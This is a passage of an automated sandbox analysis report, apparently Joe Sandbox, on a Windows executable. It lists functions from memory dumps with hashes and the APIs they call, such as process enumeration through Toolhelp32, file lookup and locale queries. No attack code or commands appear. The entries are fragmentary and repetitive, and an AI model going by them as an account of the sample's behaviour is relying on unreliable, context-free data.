                                                • Opcode Fuzzy Hash: dafe4ae703c94027c61682fa393aab4e794a961f154c1b890746c1e944275571
                                                • Instruction Fuzzy Hash: 682103B4604256EFC750DF2CD980A5ABBE0FF98350F508A2AF998CB344D374E944CB56
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2247921318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248112054.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 816a14491cab5d026b5f441abda892b9675d3a7d8d7b13345878cec3e84f2dc9
                                                • Instruction ID: d7beefd1e6405fdea3e9c6273c58dc6a0626c210e84cf1c492073799e8a8348a
                                                • Opcode Fuzzy Hash: 816a14491cab5d026b5f441abda892b9675d3a7d8d7b13345878cec3e84f2dc9
                                                • Instruction Fuzzy Hash: C201F932B04A149FD7108F59EC8485AFBE8FB05720BA641BBE518D3750E735AC50CAD8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2247961493.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2247921318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248112054.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bba16db9fe18d1294021216763c91cb410f3f25e548062a572f5b041e07ffa40
                                                • Instruction ID: 20dc9a41ebc36c65f54ff828c917c87bbfccee6e827f5727337c9189070ed0dc
                                                • Opcode Fuzzy Hash: bba16db9fe18d1294021216763c91cb410f3f25e548062a572f5b041e07ffa40
                                                • Instruction Fuzzy Hash: 05015EB1900205AFCB149FA8C94AB6E7BB8EB44700F50453AF555F3290D73899458B99
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2247961493.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2247921318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248112054.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 888c60d2457cf6dbd883993a77a6020c9e73b0fd5a151ae3ce4b865bcf7f8659
                                                • Instruction ID: 67256ad5df038b3606e19c3fd4962ab61de0c6f9014364b0e1939c668627c31a
                                                • Opcode Fuzzy Hash: 888c60d2457cf6dbd883993a77a6020c9e73b0fd5a151ae3ce4b865bcf7f8659
                                                • Instruction Fuzzy Hash: 14F0139628E3C60EC303576409269487F705D4316030A42EBD1C5DF0E3D298494AC767
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2247921318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248112054.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cba690f5d47a957bd741ad652016bf341760dcd598b7de97cca600a313a2a569
                                                • Instruction ID: 89df57f7bb204646b55b26968683c4ef02bd8f4cea2b8bf6d4b7ab31e3d0ac35
                                                • Opcode Fuzzy Hash: cba690f5d47a957bd741ad652016bf341760dcd598b7de97cca600a313a2a569
                                                • Instruction Fuzzy Hash: 07E048753087045F5305EF65F862D26B7A9D7C9710351C57EF80487A50D939B8118468
                                                APIs
                                                • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,004CF5D3,?,00000000,004E6FF3,00000000,004E719A,?,?,?,?,00000000,00000000), ref: 004CF360
                                                • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 004CF378
                                                • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 004CF38A
                                                • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 004CF39C
                                                • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 004CF3AE
                                                • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 004CF3C0
                                                • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 004CF3D2
                                                • GetProcAddress.KERNEL32(00000000,Process32First), ref: 004CF3E4
                                                • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004CF3F6
                                                • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 004CF408
                                                • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 004CF41A
                                                • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 004CF42C
                                                • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 004CF43E
                                                • GetProcAddress.KERNEL32(00000000,Module32First), ref: 004CF450
                                                • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 004CF462
                                                • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 004CF474
                                                • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 004CF486
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressProc$HandleModule
                                                • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                • API String ID: 667068680-597814768
                                                • Opcode ID: 0277385fd50417779046da1c97708c6cf814566de8c970d3c595449e61f88aca
                                                • Instruction ID: f9718cf08afcb7f2c123aec0f4f78f107bf5674d8a7886d8cd123c748e30e113
                                                • Opcode Fuzzy Hash: 0277385fd50417779046da1c97708c6cf814566de8c970d3c595449e61f88aca
                                                • Instruction Fuzzy Hash: 1C31EB74601620ABDB40EFA5E886F2E32A9AB56305BD0057FB400DF365C67DD80CAB5E
                                                APIs
                                                • GetModuleHandleA.KERNEL32(kernel32.dll,00429480,?,005080A8), ref: 00426D9D
                                                • GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 00426DAE
                                                • lstrcpyn.KERNEL32(?,?,?,?,005080A8), ref: 00426DE2
                                                • lstrcpyn.KERNEL32(?,?,?,kernel32.dll,00429480,?,005080A8), ref: 00426E53
                                                • lstrcpyn.KERNEL32(?,?,?,?,?,?,kernel32.dll,00429480,?,005080A8), ref: 00426E8E
                                                • FindFirstFileA.KERNEL32(?,?,?,?,?,?,?,?,kernel32.dll,00429480,?,005080A8), ref: 00426EA1
                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,kernel32.dll,00429480,?,005080A8), ref: 00426EAE
                                                • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,kernel32.dll,00429480,?,005080A8), ref: 00426EBA
                                                • lstrcpyn.KERNEL32(?,?,00000104,?,00000000,?,?,?,?,?,?,?,?,kernel32.dll,00429480), ref: 00426EEE
                                                • lstrlen.KERNEL32(?,?,?,00000104,?,00000000,?,?,?,?,?,?,?,?,kernel32.dll,00429480), ref: 00426EFA
                                                • lstrcpyn.KERNEL32(?,?,?,?,?,?,00000104,?,00000000,?,?,?,?,?,?,?), ref: 00426F23
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2247921318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248112054.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                • String ID: GetLongPathNameA$\$kernel32.dll
                                                • API String ID: 3245196872-1565342463
                                                • Opcode ID: 1e9e5f5c1e60c9c7e11bc2a5435a735d253322c29c089149e56c0a4f5767be2f
                                                • Instruction ID: 586d1455b15d331b35c2532f7848297220251eb4538b3ec039515ff2587fd6f2
                                                • Opcode Fuzzy Hash: 1e9e5f5c1e60c9c7e11bc2a5435a735d253322c29c089149e56c0a4f5767be2f
                                                • Instruction Fuzzy Hash: E3513C71E00129EFCF11DBE8ED85AEFB7B8AF08304F950596A514E7281D7789E44CB68
                                                APIs
                                                • GetModuleHandleA.KERNEL32(kernel32.dll,00000000,?,005080A8), ref: 00426D9D
                                                • GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 00426DAE
                                                • lstrcpyn.KERNEL32(?,?,?,?,005080A8), ref: 00426DE2
                                                • lstrcpyn.KERNEL32(?,?,?,kernel32.dll,00000000,?,005080A8), ref: 00426E53
                                                • lstrcpyn.KERNEL32(?,?,?,?,?,?,kernel32.dll,00000000,?,005080A8), ref: 00426E8E
                                                • FindFirstFileA.KERNEL32(?,?,?,?,?,?,?,?,kernel32.dll,00000000,?,005080A8), ref: 00426EA1
                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,kernel32.dll,00000000,?,005080A8), ref: 00426EAE
                                                • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,kernel32.dll,00000000,?,005080A8), ref: 00426EBA
                                                • lstrcpyn.KERNEL32(?,?,00000104,?,00000000,?,?,?,?,?,?,?,?,kernel32.dll,00000000), ref: 00426EEE
                                                • lstrlen.KERNEL32(?,?,?,00000104,?,00000000,?,?,?,?,?,?,?,?,kernel32.dll,00000000), ref: 00426EFA
                                                • lstrcpyn.KERNEL32(?,?,?,?,?,?,00000104,?,00000000,?,?,?,?,?,?,?), ref: 00426F23
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                • String ID: GetLongPathNameA$kernel32.dll
                                                • API String ID: 3245196872-3214324292
                                                • Opcode ID: 1e9e5f5c1e60c9c7e11bc2a5435a735d253322c29c089149e56c0a4f5767be2f
                                                • Instruction ID: 586d1455b15d331b35c2532f7848297220251eb4538b3ec039515ff2587fd6f2
                                                • Opcode Fuzzy Hash: 1e9e5f5c1e60c9c7e11bc2a5435a735d253322c29c089149e56c0a4f5767be2f
                                                • Instruction Fuzzy Hash: E3513C71E00129EFCF11DBE8ED85AEFB7B8AF08304F950596A514E7281D7789E44CB68
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2247961493.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2247921318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248112054.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: $&H68$&HA8$h#@
                                                • API String ID: 0-1988485601
                                                • Opcode ID: c12a2101702426d3b1f1055119c57048c86216995aa0e444666e172cc18084f5
                                                • Instruction ID: f198cd70f4d496bc7940f7355a5e4fe40ff025cce30350eb0c459dc764c5fff0
                                                • Opcode Fuzzy Hash: c12a2101702426d3b1f1055119c57048c86216995aa0e444666e172cc18084f5
                                                • Instruction Fuzzy Hash: A8130C71D002289BCB25DF65DD88BDEBBB9FB48301F1081EAE50AA6250DE745F85CF64
                                                APIs
                                                • FindFirstFileA.KERNEL32(00000000,?), ref: 0042AD73
                                                • FindClose.KERNEL32(00000000,00000000,?), ref: 0042AD7E
                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0042AD97
                                                • FileTimeToDosDateTime.KERNEL32(?,?,?), ref: 0042ADA8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FileTime$Find$CloseDateFirstLocal
                                                • String ID:
                                                • API String ID: 2659516521-0
                                                • Opcode ID: 473b17c5f252b0e9e729cd0a96b9c16a6b6f39296930207070ea6e7241cc10d3
                                                • Instruction ID: 10a826d6c87f77ee9b02bc66e20b2e495e265b6b27e8256208fcfbb2e3f103a5
                                                • Opcode Fuzzy Hash: 473b17c5f252b0e9e729cd0a96b9c16a6b6f39296930207070ea6e7241cc10d3
                                                • Instruction Fuzzy Hash: 35F01872E0421C66CF50E6E59D85ACFB3AC5F05324F900B97FA14E3191EA389B584755
                                                APIs
                                                • FindFirstFileA.KERNEL32(00000000,?), ref: 0042AD73
                                                • FindClose.KERNEL32(00000000,00000000,?), ref: 0042AD7E
                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0042AD97
                                                • FileTimeToDosDateTime.KERNEL32(?,?,?), ref: 0042ADA8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2247921318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248112054.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FileTime$Find$CloseDateFirstLocal
                                                • String ID:
                                                • API String ID: 2659516521-0
                                                • Opcode ID: 4c8514bed77c8f8ef8ecd83c1db9f23a5fd5146bb2be9325bbea4d0af959dd89
                                                • Instruction ID: 10a826d6c87f77ee9b02bc66e20b2e495e265b6b27e8256208fcfbb2e3f103a5
                                                • Opcode Fuzzy Hash: 4c8514bed77c8f8ef8ecd83c1db9f23a5fd5146bb2be9325bbea4d0af959dd89
                                                • Instruction Fuzzy Hash: 35F01872E0421C66CF50E6E59D85ACFB3AC5F05324F900B97FA14E3191EA389B584755
                                                APIs
                                                • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,0042F6AC), ref: 0042F66E
                                                • GetACP.KERNEL32(?,?,00001004,?,00000007,00000000,0042F6AC), ref: 0042F687
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: InfoLocale
                                                • String ID:
                                                • API String ID: 2299586839-0
                                                • Opcode ID: f74e1652d328315e8a71d5c580b2509689d032b344377af24476d69b52f3eba1
                                                • Instruction ID: 4091fbb67a12fb18c5be68bf9ecc5cfdf49809a89dc8e7d05204e8bc88a69848
                                                • Opcode Fuzzy Hash: f74e1652d328315e8a71d5c580b2509689d032b344377af24476d69b52f3eba1
                                                • Instruction Fuzzy Hash: 97F0F631F086047FD700EEA2EC5299EB3BEDBC8718FD0C47AB110D3580EA7C65058658
                                                APIs
                                                • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,0042F6AC), ref: 0042F66E
                                                • GetACP.KERNEL32(?,?,00001004,?,00000007,00000000,0042F6AC), ref: 0042F687
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2247921318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248112054.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: InfoLocale
                                                • String ID:
                                                • API String ID: 2299586839-0
                                                • Opcode ID: 9a784085bd7f3538c7ce5e18c374c9a1980d11c38dae54d8af34c154640d9c4a
                                                • Instruction ID: 4091fbb67a12fb18c5be68bf9ecc5cfdf49809a89dc8e7d05204e8bc88a69848
                                                • Opcode Fuzzy Hash: 9a784085bd7f3538c7ce5e18c374c9a1980d11c38dae54d8af34c154640d9c4a
                                                • Instruction Fuzzy Hash: 97F0F631F086047FD700EEA2EC5299EB3BEDBC8718FD0C47AB110D3580EA7C65058658
                                                APIs
                                                • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 0042AFE8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: DiskFreeSpace
                                                • String ID:
                                                • API String ID: 1705453755-0
                                                • Opcode ID: 1b8a2110958a1f89462fb010ca30020be9a49356f0795ae89d556df9bcdbb605
                                                • Instruction ID: 2def100504cc45c036bf0a67124c5dcfc61c37126cf4f8a29cb8a04150565c99
                                                • Opcode Fuzzy Hash: 1b8a2110958a1f89462fb010ca30020be9a49356f0795ae89d556df9bcdbb605
                                                • Instruction Fuzzy Hash: 7C11FEB1F00109AFDB44CFA9C9819EFF7F9FF8C304F51816AA519E7250E6359A018BA4
                                                APIs
                                                • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 0042AFE8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2247921318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248112054.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: DiskFreeSpace
                                                • String ID:
                                                • API String ID: 1705453755-0
                                                • Opcode ID: 1b8a2110958a1f89462fb010ca30020be9a49356f0795ae89d556df9bcdbb605
                                                • Instruction ID: 2def100504cc45c036bf0a67124c5dcfc61c37126cf4f8a29cb8a04150565c99
                                                • Opcode Fuzzy Hash: 1b8a2110958a1f89462fb010ca30020be9a49356f0795ae89d556df9bcdbb605
                                                • Instruction Fuzzy Hash: 7C11FEB1F00109AFDB44CFA9C9819EFF7F9FF8C304F51816AA519E7250E6359A018BA4
                                                APIs
                                                • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,0042791E), ref: 004278DE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: InfoLocale
                                                • String ID:
                                                • API String ID: 2299586839-0
                                                • Opcode ID: 3c0648734114710e06f6f1c24ec6e0f83ae3f6c99a583367c63b78fb16a7a424
                                                • Instruction ID: fb32a1b765e03203df5015b1259a1965979ba31e2bf7b5c5092c51118814488a
                                                • Opcode Fuzzy Hash: 3c0648734114710e06f6f1c24ec6e0f83ae3f6c99a583367c63b78fb16a7a424
                                                • Instruction Fuzzy Hash: 8DF0CD70B04729EFE705DFA1EC52AAEB37AF784714F908576A11053590D7B82740C658
                                                APIs
                                                • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,0042791E), ref: 004278DE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2247921318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248112054.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: InfoLocale
                                                • String ID:
                                                • API String ID: 2299586839-0
                                                • Opcode ID: af1bfd8e69f9984f7fb26f4ced8ddd975b12019d5febe14705a59c8ecca5b09a
                                                • Instruction ID: fb32a1b765e03203df5015b1259a1965979ba31e2bf7b5c5092c51118814488a
                                                • Opcode Fuzzy Hash: af1bfd8e69f9984f7fb26f4ced8ddd975b12019d5febe14705a59c8ecca5b09a
                                                • Instruction Fuzzy Hash: 8DF0CD70B04729EFE705DFA1EC52AAEB37AF784714F908576A11053590D7B82740C658
                                                APIs
                                                • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0042DF4A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: InfoLocale
                                                • String ID:
                                                • API String ID: 2299586839-0
                                                • Opcode ID: 02c76955cf76a6900d1ea8f5196ee3eba2b4828709b425f463c9b1e0e74b7afb
                                                • Instruction ID: 9adc8e24113dc74c646f78799680e7491a454e135354c415feb62a3ff91585d8
                                                • Opcode Fuzzy Hash: 02c76955cf76a6900d1ea8f5196ee3eba2b4828709b425f463c9b1e0e74b7afb
                                                • Instruction Fuzzy Hash: 72E0D832B0023427D310A9596C829FB735C9B5C710F80417FBD05D7345EDB89D8446ED
                                                APIs
                                                • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0042DF4A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2247921318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2247961493.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248112054.000000000041F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: InfoLocale
                                                • String ID:
                                                • API String ID: 2299586839-0
                                                • Opcode ID: 70ba8fbb5a0d667d47bb55d1dc4b5bdc7dc3dd4ba2f7f3f015b5b5c1073e8249
                                                • Instruction ID: 9adc8e24113dc74c646f78799680e7491a454e135354c415feb62a3ff91585d8
                                                • Opcode Fuzzy Hash: 70ba8fbb5a0d667d47bb55d1dc4b5bdc7dc3dd4ba2f7f3f015b5b5c1073e8249
                                                • Instruction Fuzzy Hash: 72E0D832B0023427D310A9596C829FB735C9B5C710F80417FBD05D7345EDB89D8446ED
                                                APIs
                                                • GetLocaleInfoA.KERNEL32(?,?,?,00000002), ref: 0042DF8B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000000.00000002.2248155942.0000000000539000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: InfoLocale
                                                • String ID:
                                                • API String ID: 2299586839-0
                                                • Opcode ID: 7cd62799840ad606dda073222d74f30895bf9c819bf335440192771876a3bc3b
                                                • Instruction ID: 215745da1fc6aec5115baa79eecb49f9d22e61944b801cb0a3a2e5464dd2748a
                                                • Opcode Fuzzy Hash: 7cd62799840ad606dda073222d74f30895bf9c819bf335440192771876a3bc3b
                                                • Instruction Fuzzy Hash: EDD05E6670E2602EA310955B3E85DBB4B9CCAC67A6F52443FF989C6201D6148C0A937D
                                                APIs
                                                • GetLocaleInfoA.KERNEL32(?,?,?,00000002), ref: 0042DF8B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2248155942.0000000000421000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2247921318.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
